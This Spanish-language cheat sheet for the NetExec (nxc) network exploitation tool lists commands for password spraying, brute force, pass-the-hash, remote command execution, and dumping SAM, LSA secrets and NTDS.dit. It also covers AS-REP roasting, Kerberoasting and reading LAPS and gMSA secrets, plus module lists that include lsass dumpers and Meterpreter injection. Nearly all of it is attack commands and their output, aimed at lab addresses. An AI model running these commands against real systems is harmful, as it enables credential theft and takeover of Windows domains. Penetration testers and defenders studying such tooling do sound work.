NetExec
Última actualización
Última actualización
NetExec (también conocido como nxc) es una herramienta de explotación de servicios de red que ayuda a automatizar la evaluación de la seguridad de redes de gran tamaño. Se basa en CrackMapExec, lo que hace que la herramienta sea fácil de usar.
En Kali Linux la herramienta se puede instalar simplemente a través del siguiente comando.
sudo apt install netexec -yEn caso de disponer de otra distribución, podemos revisar la página oficial de NetExec.
Verificar credenciales válidas de un usuario autenticándose mediante SMB.
# Autenticación básica para comprobar credenciales válidas con autenticación NTLM.
nxc smb 10.10.10.10 -u 'user' -p 'password'
# Autenticación para comprobar credenciales válidas con autenticación Kerberos.
nxc smb dc.domain.htb -u 'user' -p 'password' -k
# Autenticación para comprobar ticket (.ccache) de Kerberos es válido
nxc smb dc.domain.htb -u 'user' --use-kcache
# Autenticación realizando PassTheHash para verificar si el hash NT es válido.
nxc smb 10.10.10.10 -u 'user' -H '<NTLM_HASH>'# Password Spraying sobre un usuario para probar un listado de contraseñas.
nxc smb 10.10.10.10 -u 'user' -p passwords.txt --continue-on-success
# Password Spraying con una contraseña sobre un listado de usuarios.
nxc smb 10.10.10.10 -u users.txt -p 'Password01!' --continue-on-success
# Password Spraying sin BruteForce, probar 1 línea de users con 1 línea de passwords, succesivamente.
nxc smb 10.10.10.10 -u users.txt -p passwords.txt --no-bruteforce
# Ataque de fuerza bruta con un listado de usuarios y contraseñas.
nxc smb 10.10.10.10 -u users.txt -p passwords.txt --continue-on-success# Verificar si el usuario tiene permisos para conectarse mediante WinRM - EvilWinRM
nxc winrm 10.10.10.10 -u 'user' -p 'password'
# Ejemplo en caso de que SI dispusiéramos de acceso.
❯ nxc winrm 10.10.10.10 -u 'user' -p 'password'
WINRM 10.10.10.10 5985 GZZCOO [*] Windows 10 / Server 2019 Build 17763 (name:GZZCOO) (domain:Gzzcoo)
WINRM 10.10.10.10 5985 GZZCOO [+] Gzzcoo\user:password (Pwn3d!)
# Ejemplo en caso de que NO dispusiéramos de acceso.
❯ nxc winrm 10.10.10.10 -u 'user' -p 'password'
WINRM 10.10.10.10 5985 GZZCOO [*] Windows 10 / Server 2019 Build 17763 (name:GZZCOO) (domain:Gzzcoo)
WINRM 10.10.10.10 5985 GZZCOO [-] Gzzcoo\user:password# Enumerar recursos compartidos del SMB que disponemos de permisos.
nxc smb 10.10.10.10 -u 'user' -p 'password' --shares
# Crear un JSON de la estructura de los recursos del SMB para ver dónde hay archivos interesantes.
nxc smb 10.10.10.10 -u 'user' -p 'password' -M spider_plus
# Enumeración completa desde SMB.
nxc smb 10.10.10.10 -u 'user' -p 'password' --groups --local-groups --loggedon-users --rid-brute --sessions --users --shares --pass-pol# Obtener usuarios del dominio a través de RID Cycling Attack si el IPC$ está habilitado
nxc smb 10.10.10.10 -u 'user' -p 'password' --rid-brute
# Obtener solamente el listado de usuarios al realizar RID Cycling Attack
nxc smb 10.10.10.10 -u 'user' -p 'password' --rid-brute | grep SidTypeUser | rev | awk '{print $2}' | rev | awk '{print $2}' FS='\\'nxc smb 10.10.10.10 -u 'user' -p 'password' --loggedon-usersnxc smb 10.10.10.10 -u 'user' -p 'password' --sessionsnxc smb 10.10.10.10 -u 'user' -p 'password' --share 'SHARE' --get-file 'FILE_TARGET' 'OUTPUT_FILE'nxc smb 10.10.10.10 -u 'user' -p 'password' -x 'whoami'Dumping SAM
nxc smb 10.10.10.10 -u 'user' -p 'password' --samDumping LSASS
nxc smb 10.10.10.10 -u 'user' -p 'password' --lsaDumping NTDS.dit
nxc smb 10.10.10.10 -u 'user' -p 'password' --ntds vssA través de nxc podemos efectuar los siguientes ataques en el protocolo de Kerberos.
Para un único usuario.
nxc ldap 10.10.10.10 -u 'user' -p '' --asreproast hashes.txtPara un listado de usuarios.
nxc ldap 10.10.10.10 -u users.txt -p '' --asreproast hashes.txtnxc ldap 10.10.10.10 -u 'user' -p 'password' --kerberoasting hashes.txtSi disponemos credenciales, podemos usar nxc para obtener archivos zip o .json para BloodHound.
nxc ldap 10.10.10.10 -u 'user' -p 'password' --bloodhound -ns 10.10.10.10 --collection Allnxc ldap 10.10.10.10 -u 'user' -p 'password' --gmsanxc ldap 10.10.10.10 -u 'user' -p 'password' -M lapsEnumerar todos los usuarios del AD.
nxc ldap 10.10.10.10 -u 'user' -p 'password' --usersEnumerar solamente los usuarios que se encuentren activo en el AD.
nxc ldap 10.10.10.10 -u 'user' -p 'password' --active-usersEnumerar los grupos del AD.
nxc ldap 10.10.10.10 -u 'user' -p 'password' --groups# Verificar autenticación al FTP, en este caso, comprobar usuario anonymous si es válido
nxc ftp 10.10.10.10 -u 'anonymous' -p ''
# Listar el contenido del servidor FTP
nxc ftp 10.10.10.10 -u 'usuario' -p 'password' --ls
nxc ftp 10.10.10.10 -u 'usuario' -p 'password' --ls '<Directorio>'
# Descargar archivo que se encuentra en el FTP
nxc ftp 10.10.10.10 -u 'usuario' -p 'password' --get '<PATH_OF_TARGET_FILE>'
# Subir archivo al servidor FTP
nxc ftp 10.10.10.10 -u 'usuario' -p 'password' --put '<path_local_file>' '<destination_path_file>'Windows Auth
# Si el SMB se encuentra expuesto
nxc mssql 10.10.10.10 -u 'user' -p 'password'
# Si el SMB no se encuentra expuesto, hay que añadir -d domain
nxc mssql 10.10.10.10 -u 'user' -p 'password' -d dominio.htbLocal Auth
# Autenticación con credenciales de MSSQL y no de Windows
nxc mssql 10.10.10.10 -u 'user' -p 'password' --local-authSpecify Port
# En caso de que MSSQL se encuentre en otro puerto, hay que especificarlo con --port
nxc mssql 10.10.10.10 -u 'user' -p 'password' --port 1234# Ejecutar QUERYS desde nxc
nxc mssql 10.10.10.10 -u 'user' -p 'password' -q 'SELECT name FROM master.dbo.sysdatabases;'# Ejecutar comandos arbitrarios en el sistema para obtener Remote Code Execution (RCE)
nxc mssql 10.10.10.10 -u 'user' -p 'password' -x whoami# Verificar si el equipo es vulnerable a ZeroLogon (CVE-2020-1472)
nxc smb 10.10.10.10 -u 'user' -p 'password' -M zerologon
# Verificar si el equipo es vulnerable a EternalBlue MS17-010 (CVE-2017-0144)
nxc smb 10.10.10.10 -u 'user' -p 'password' -M ms17-010
# Verificar si el equipo es vulnerable a PrintNightmare (CVE-2021-1675)
nxc smb 10.10.10.10 -u 'user' -p 'password' -M printnightmare
# Verificar si el equipo es vulnerable a SMBGhost (CVE-2020-0796)
nxc smb 10.10.10.10 -u 'user' -p 'password' -M smbghost
# Verificar si el equipo es vulnerable a noPAC (CVE-2021-42278 && CVE-2021-42287)
nxc smb 10.10.10.10 -u 'user' -p 'password' -M nopac❯ nxc smb -L
LOW PRIVILEGE MODULES
[*] add-computer Adds or deletes a domain computer
[*] coerce_plus Module to check if the Target is vulnerable to any coerce vulns. Set LISTENER IP for coercion.
[*] dfscoerce [REMOVED] Module to check if the DC is vulnerable to DFSCoerce, credit to @filip_dragovic/@Wh04m1001 and @topotam
[*] drop-sc Drop a searchConnector-ms file on each writable share
[*] enum_av Gathers information on all endpoint protection solutions installed on the the remote host(s) via LsarLookupNames (no privilege needed)
[*] enum_ca Anonymously uses RPC endpoints to hunt for ADCS CAs
[*] gpp_autologin Searches the domain controller for registry.xml to find autologon information and returns the username and password.
[*] gpp_password Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.
[*] ioxidresolver This module helps you to identify hosts that have additional active interfaces
[*] ms17-010 MS17-010 - EternalBlue - NOT TESTED OUTSIDE LAB ENVIRONMENT
[*] nopac Check if the DC is vulnerable to CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user
[*] petitpotam [REMOVED] Module to check if the DC is vulnerable to PetitPotam, credit to @topotam
[*] printerbug [REMOVED] Module to check if the Target is vulnerable to PrinterBug. Set LISTENER IP for coercion.
[*] printnightmare Check if host vulnerable to printnightmare
[*] scuffy Creates and dumps an arbitrary .scf file with the icon property containing a UNC path to the declared SMB server against all writeable shares
[*] shadowcoerce [REMOVED] Module to check if the target is vulnerable to ShadowCoerce, credit to @Shutdown and @topotam
[*] slinky Creates windows shortcuts with the icon attribute containing a URI to the specified server (default SMB) in all shares with write permissions
[*] smbghost Module to check for the SMB dialect 3.1.1 and compression capability of the host, which is an indicator for the SMBGhost vulnerability (CVE-2020-0796).
[*] spider_plus List files recursively and save a JSON share-file metadata to the 'OUTPUT_FOLDER'. See module options for finer configuration.
[*] spooler Detect if print spooler is enabled or not
[*] webdav Checks whether the WebClient service is running on the target
[*] zerologon Module to check if the DC is vulnerable to Zerologon aka CVE-2020-1472
HIGH PRIVILEGE MODULES (requires admin privs)
[*] bitlocker Enumerating BitLocker Status on target(s) If it is enabled or disabled.
[*] empire_exec Uses Empire's RESTful API to generate a launcher for the specified listener and executes it
[*] enum_dns Uses WMI to dump DNS from an AD DNS Server
[*] firefox Dump credentials from Firefox
[*] get_netconnections Uses WMI to query network connections.
[*] handlekatz Get lsass dump using handlekatz64 and parse the result with pypykatz
[*] hash_spider Dump lsass recursively from a given hash using BH to find local admins
[*] hyperv-host Performs a registry query on the VM to lookup its HyperV Host
[*] iis Checks for credentials in IIS Application Pool configuration files using appcmd.exe
[*] impersonate List and impersonate tokens to run command as locally logged on users
[*] install_elevated Checks for AlwaysInstallElevated
[*] keepass_discover Search for KeePass-related files and process.
[*] keepass_trigger Set up a malicious KeePass trigger to export the database in cleartext.
[*] lsassy Dump lsass and parse the result remotely with lsassy
[*] masky Remotely dump domain user credentials via an ADCS and a KDC
[*] met_inject Downloads the Meterpreter stager and injects it into memory
[*] mobaxterm Remotely dump MobaXterm credentials via RemoteRegistry or NTUSER.dat export
[*] mremoteng Dump mRemoteNG Passwords in AppData and in Desktop / Documents folders (digging recursively in them)
[*] msol Dump MSOL cleartext password from the localDB on the Azure AD-Connect Server
[*] nanodump Get lsass dump using nanodump and parse the result with pypykatz
[*] ntdsutil Dump NTDS with ntdsutil
[*] ntlmv1 Detect if lmcompatibilitylevel on the target is set to lower than 3 (which means ntlmv1 is enabled)
[*] pi Run command as logged on users via Process Injection
[*] powershell_history Extracts PowerShell history for all users and looks for sensitive commands.
[*] procdump Get lsass dump using procdump64 and parse the result with pypykatz
[*] putty Query the registry for users who saved ssh private keys in PuTTY. Download the private keys if found.
[*] rdcman Remotely dump Remote Desktop Connection Manager (sysinternals) credentials
[*] rdp Enables/Disables RDP
[*] reg-query Performs a registry query on the machine
[*] reg-winlogon Collect autologon credential stored in the registry
[*] runasppl Check if the registry value RunAsPPL is set or not
[*] schtask_as Remotely execute a scheduled task as a logged on user
[*] security-questions Gets security questions and answers for users on computer
[*] teams_localdb Retrieves the cleartext ssoauthcookie from the local Microsoft Teams database, if teams is open we kill all Teams process
[*] test_connection Pings a host
[*] uac Checks UAC status
[*] veeam Extracts credentials from local Veeam SQL Database
[*] vnc Loot Passwords from VNC server and client configurations
[*] wcc Check various security configuration items on Windows machines
[*] wdigest Creates/Deletes the 'UseLogonCredential' registry key enabling WDigest cred dumping on Windows >= 8.1
[*] web_delivery Kicks off a Metasploit Payload using the exploit/multi/script/web_delivery module
[*] wifi Get key of all wireless interfaces
[*] winscp Looks for WinSCP.ini files in the registry and default locations and tries to extract credentials.❯ nxc wmi -L
LOW PRIVILEGE MODULES
[*] ioxidresolver This module helps you to identify hosts that have additional active interfaces
[*] spooler Detect if print spooler is enabled or not
[*] zerologon Module to check if the DC is vulnerable to Zerologon aka CVE-2020-1472
HIGH PRIVILEGE MODULES (requires admin privs)
[*] bitlocker Enumerating BitLocker Status on target(s) If it is enabled or disabled.
[*] enum_dns Uses WMI to dump DNS from an AD DNS Server
[*] get_netconnections Uses WMI to query network connections.
[*] rdp Enables/Disables RDP❯ nxc mssql -L
LOW PRIVILEGE MODULES
[*] mssql_priv Enumerate and exploit MSSQL privileges
HIGH PRIVILEGE MODULES (requires admin privs)
[*] empire_exec Uses Empire's RESTful API to generate a launcher for the specified listener and executes it
[*] met_inject Downloads the Meterpreter stager and injects it into memory
[*] nanodump Get lsass dump using nanodump and parse the result with pypykatz
[*] test_connection Pings a host
[*] web_delivery Kicks off a Metasploit Payload using the exploit/multi/script/web_delivery module❯ nxc ldap -L
LOW PRIVILEGE MODULES
[*] adcs Find PKI Enrollment Services in Active Directory and Certificate Templates Names
[*] daclread Read and backup the Discretionary Access Control List of objects. Be careful, this module cannot read the DACLS recursively, see more explanation in the options.
[*] enum_trusts Extract all Trust Relationships, Trusting Direction, and Trust Transitivity
[*] find-computer Finds computers in the domain via the provided text
[*] get-desc-users Get description of the users. May contained password
[*] get-network Query all DNS records with the corresponding IP from the domain.
[*] get-unixUserPassword Get unixUserPassword attribute from all users in ldap
[*] get-userPassword Get userPassword attribute from all users in ldap
[*] group-mem Retrieves all the members within a Group
[*] groupmembership Query the groups to which a user belongs.
[*] laps Retrieves all LAPS passwords which the account has read permissions for.
[*] ldap-checker Checks whether LDAP signing and binding are required and / or enforced
[*] maq Retrieves the MachineAccountQuota domain-level attribute
[*] obsolete Extract all obsolete operating systems from LDAP
[*] pre2k Identify pre-created computer accounts, save the results to a file, and obtain TGTs for each
[*] pso Module to get the Fine Grained Password Policy/PSOs
[*] sccm Find a SCCM infrastructure in the Active Directory
[*] subnets Retrieves the different Sites and Subnets of an Active Directory
[*] user-desc Get user descriptions stored in Active Directory
[*] whoami Get details of provided user
HIGH PRIVILEGE MODULES (requires admin privs)
